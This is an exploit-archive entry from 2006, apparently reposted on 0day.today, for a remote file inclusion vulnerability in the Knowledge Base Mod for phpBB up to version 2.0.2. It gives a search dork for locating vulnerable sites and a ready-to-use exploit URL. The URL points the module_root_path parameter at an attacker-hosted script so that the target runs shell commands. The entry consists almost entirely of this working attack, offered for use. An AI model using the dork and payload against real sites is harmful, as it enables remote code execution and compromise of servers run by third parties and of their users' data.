id: 389
date: 04/28/2006
title: Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability
author: [Oo]
cves: 

==================================================================
Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability
==================================================================




Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
Dork: "Powered by Knowledge Base"
Credits: [Oo]

Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2023-03-26]  #